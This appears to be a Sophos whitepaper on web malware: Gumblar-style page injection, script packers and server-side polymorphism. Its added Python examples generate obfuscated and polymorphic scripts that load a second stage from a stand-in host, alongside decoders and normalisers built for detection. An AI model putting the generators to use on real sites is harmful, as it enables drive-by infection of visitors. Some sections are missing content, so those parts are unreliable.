The internet is now the number-one conduit for infecting users with malware. SophosLabs reports that in 2009, 23,500 new infected web pages were being discovered every day: roughly one every four seconds, and four times the rate seen over the same period in 2008 [1]. Malware authors have had great success with one method in particular: compromising popular, high-traffic, legitimate sites in order to kick-start the infection process [2].
Users visiting a hijacked site have no way of knowing it has been compromised: the injected code is invisible on the rendered page but runs as soon as the page loads in the browser. Typically that code loads a second-stage script from a third-party site under the attacker's control, and the second stage then tries one or more of dozens of known exploits against the browser or the operating system in order to infect the machine, steal data or recruit it into a botnet.
The scope of these attacks should not be underestimated: sites of every type, from government websites and educational establishments to popular news portals, blogs and social networking sites, have been targeted.
A simple illustration of this is shown in Figure 1. In (A), the page has been injected with a plain HTML iframe, which makes the browser load malicious content from the remote site whenever the page is viewed; in (B), an injected script element does the same.
Figure 1: Simple example of a web page compromised in different ways, but where the payload is exactly the same. The injected iframe (A) and script (B) cause the browser to load content from the malicious remote site when the page is browsed.
A good example of this kind of attack is Gumblar [3], in which many sites were injected with a malicious script that used simple character substitution to hide its payload (Figure 2A). The payload is not visible in the injected script, but after manual deobfuscation it is obvious (Figure 2B): the loading of a malicious script from a remote site.
Figure 2: Malicious script (A) injected into legitimate pages as part of the Gumblar mass-defacement attacks during 2009. The manually deobfuscated script is shown in (B).
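To make the deobfuscation step concrete, the following is an added example written for this article; it is neither SophosLabs code nor Gumblar's real routine. It builds a Gumblar-style injected script (a payload hidden by a fixed character-substitution rule and wrapped in a small JavaScript loop that undoes the substitution before calling eval) and then shows the analyst's side in Python: a decoder that reads the substitution parameters out of the wrapper instead of assuming them, recovers the plaintext, and pulls out the remote script URL. The substitution rule (rotation within printable ASCII), the wrapper layout and the host evil-example.invalid are all constructed for the example.

```python
"""Added example: a Gumblar-style character-substitution wrapper and the decoder
an analyst writes for it. Not SophosLabs code and not Gumblar's real routine;
the substitution rule, wrapper layout and host evil-example.invalid are constructed."""
import re

# The second stage the attacker wants the browser to run (constructed host).
PAYLOAD = 'document.write(\'<script src="http://evil-example.invalid/x.js"></script>\');'

# Substitution: rotate every printable ASCII character (0x21-0x7e) by a fixed
# offset; spaces and control characters pass through untouched.
LO, HI = 0x21, 0x7E
SPAN = HI - LO + 1


def substitute(text, shift):
    out = []
    for ch in text:
        code = ord(ch)
        if LO <= code <= HI:
            code = LO + (code - LO + shift) % SPAN
        out.append(chr(code))
    return "".join(out)


def obfuscate(payload, shift):
    """Attacker side: substituted payload + a JS loop that reverses it, then eval()."""
    body = substitute(payload, shift).replace("\\", "\\\\").replace('"', '\\"')
    return (
        'var s="%s";var d="",i;' % body
        + "for(i=0;i<s.length;i++){var c=s.charCodeAt(i);"
        + "if(c>=%d&&c<=%d)c=%d+(c-%d+%d)%%%d;" % (LO, HI, LO, LO, SPAN - shift, SPAN)
        + "d+=String.fromCharCode(c);}eval(d);"
    )


WRAPPER = re.compile(
    r'var s="((?:[^"\\]|\\.)*)".*?'                              # the encoded literal
    r"if\(c>=(\d+)&&c<=(\d+)\)c=\d+\+\(c-\d+\+(\d+)\)%(\d+)",    # the loop's arithmetic
    re.S,
)


def deobfuscate(script):
    """Analyst side: read the substitution parameters out of the wrapper, then undo it."""
    m = WRAPPER.search(script)
    if not m:
        raise ValueError("decoder loop not recognised")
    literal = re.sub(r"\\(.)", r"\1", m.group(1))   # undo JS string escaping
    lo, hi, add, span = (int(g) for g in m.groups()[1:])
    out = []
    for ch in literal:
        code = ord(ch)
        if lo <= code <= hi:
            code = lo + (code - lo + add) % span
        out.append(chr(code))
    return "".join(out)


SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc=["']([^"']+)""", re.I)


def remote_sources(decoded):
    """URLs the decoded payload would make the browser fetch."""
    return SCRIPT_SRC.findall(decoded)


# Constructed sample, generated here so the decoder can be checked against a known plaintext.
INJECTED = obfuscate(PAYLOAD, 7)

if __name__ == "__main__":
    print("injected (as in Figure 2A):", INJECTED)
    print("decoded  (as in Figure 2B):", deobfuscate(INJECTED))
    print("loads from:", remote_sources(deobfuscate(INJECTED)))
```

The point of parsing the loop's constants rather than hard-coding them is that a family like this changes its offset between campaigns; a decoder keyed to the wrapper's shape keeps working, and the first unescaped quote reliably ends the literal even when the substituted bytes happen to contain a quote or backslash.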
The reach of mass-defacement attacks such as Gumblar can be huge. Soon after SophosLabs added detection for it (as Troj/JSRedir-R), the threat rose to the top of SophosLabs' web threat statistics, dwarfing every other threat at the time (Figure 3).
Figure 3: Top web threats detected between May 6 and 13, 2009. Troj/JSRedir-R (aka Gumblar) dwarfs all other detections at >40% of total reports.
Commercial script packers
- Protection of intellectual property: Developers may obfuscate their code with such tools to make it harder for others to copy.
- Efficiency: Some tools can produce smaller scripts that are quicker to download, resulting in more responsive sites.
This creates yet another problem for analysts and content scanners: when attackers obfuscate their malicious scripts with commercial tools, anti-malware analysts have to be careful not to generate false positives on legitimate scripts that were packed with the same tool [4].
Server-side polymorphism (SSP)
Many of today's threats also use advanced scripting on the server in order to create polymorphic malicious code. For example, during 2009 SophosLabs identified several attacks aiming to infect users with Zbot [5,6] that made aggressive use of SSP: the scripts used to exploit vulnerabilities on users' machines were generated dynamically on the server, so that every request received a slightly different script.
SSP is essentially a special case of obfuscation, and again it poses a challenge to anti-malware analysts and content scanners: a signature on the exact bytes of one sample will not match the next one served.
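As an added example, not from the article or from any real exploit kit: a Python stand-in for a server that emits a different script on every request (random identifier names, string literals chopped into random concatenations, a junk comment at a random position) while the behaviour, loading a second-stage script from the constructed host evil-example.invalid, never changes. Next to it is the normaliser a content scanner needs in order to cope: it strips comments, folds the concatenations back together and renames attacker-chosen identifiers in order of first use, so that all the variants collapse to one canonical form that can be hashed or searched for the payload URL. Everything here, including the host name and the list of DOM names treated as fixed, is constructed for the example.

```python
"""Added example of server-side polymorphism (not SophosLabs code).
The 'server' below is a stand-in for an exploit-kit front end; the only thing
its output does is load a second-stage script from a constructed host."""
import hashlib
import random
import re
import string

PAYLOAD_URL = "http://evil-example.invalid/kit.js"   # constructed host, not a real one
ALNUM = string.ascii_letters + string.digits + "_"


def _ident(rng, n=8):
    """Random JavaScript identifier; a different one on every request."""
    return rng.choice(string.ascii_letters + "_") + "".join(rng.choice(ALNUM) for _ in range(n - 1))


def _split_string(rng, s):
    """Turn "head" into something like "h"+"ea"+"d" with random cut points."""
    parts, i = [], 0
    while i < len(s):
        step = rng.randint(1, 6)
        parts.append(s[i:i + step])
        i += step
    return "+".join('"%s"' % p for p in parts)


def serve_variant(seed):
    """One response from the polymorphic server: same behaviour, different bytes."""
    rng = random.Random(seed)
    url, doc, el = _ident(rng), _ident(rng), _ident(rng)
    lines = [
        "var %s=%s;" % (url, _split_string(rng, PAYLOAD_URL)),
        "var %s=document;" % doc,
        "var %s=%s.createElement(%s);" % (el, doc, _split_string(rng, "script")),
        "%s.src=%s;" % (el, url),
        "%s.getElementsByTagName(%s)[0].appendChild(%s);"
        % (doc, _split_string(rng, "head"), el),
    ]
    lines.insert(rng.randint(0, len(lines)), "/* %s */" % _ident(rng, 12))  # junk comment
    return "".join(lines)


# --- the scanner side -------------------------------------------------------
COMMENT = re.compile(r"/\*.*?\*/", re.S)
CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
# string literal | identifier | number | whitespace | any other single character
TOKEN = re.compile(r'"[^"]*"|[A-Za-z_]\w*|\d+|\s+|.', re.S)
# DOM names the script cannot rename (constructed list); anything else is a local
# the attacker chose and is free to vary.
FIXED = {"var", "document", "createElement", "src", "getElementsByTagName", "appendChild"}


def _wordchar(c):
    return c.isalnum() or c == "_"


def normalise(script):
    """Canonical form: comments gone, "a"+"b" folded to "ab", locals renamed v0, v1, ..."""
    s = COMMENT.sub("", script)
    while True:                                   # fold until no "x"+"y" remains
        s, n = CONCAT.subn(r'"\1\2"', s)
        if n == 0:
            break
    names, out = {}, []
    for tok in TOKEN.findall(s):
        if tok.isspace():
            continue                              # layout carries no meaning
        if re.match(r"[A-Za-z_]", tok) and tok not in FIXED:
            tok = names.setdefault(tok, "v%d" % len(names))
        if out and _wordchar(out[-1][-1]) and _wordchar(tok[0]):
            out.append(" ")                       # keep "var v0" from fusing
        out.append(tok)
    return "".join(out)


def byte_hash(script):
    """What a naive signature keys on: the exact bytes served."""
    return hashlib.sha256(script.encode()).hexdigest()


def behaviour_hash(script):
    """Hash of the normalised form; stable across the server's variants."""
    return byte_hash(normalise(script))


def extract_url(script):
    """The second-stage URL, visible only once the concatenations are folded."""
    m = re.search(r'"(https?://[^"]+)"', normalise(script))
    return m.group(1) if m else None


if __name__ == "__main__":
    for seed in (1, 2):
        v = serve_variant(seed)
        print(v)
        print("  bytes:", byte_hash(v)[:16], " behaviour:", behaviour_hash(v)[:16],
              " loads:", extract_url(v))
```

Two requests with different seeds produce scripts whose byte hashes differ and in which the URL never appears whole, yet both normalise to the same string; that canonical form is what a scanner or analyst can match on, and it is also the place to look for the payload URL.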
Malicious PDF documents
The key benefits of this new technology to Sophos customers are:
- Increased detection rates of malicious script content and PDFs
- Increased proactive (zero-day) protection against new attacks
In November 2009, Sophos Web Security and Control will include this functionality in the core anti-malware engine. This update will be rolled out to all customer appliances as part of the monthly update package (no additional work will be necessary).
From early 2010, the technology will also be included in the Browser Helper Object (BHO) component of Sophos Endpoint Security and Data Protection, which runs inside Internet Explorer and stops it from processing malware in the content it fetches.
To learn more about Sophos please visit: http://www.sophos.com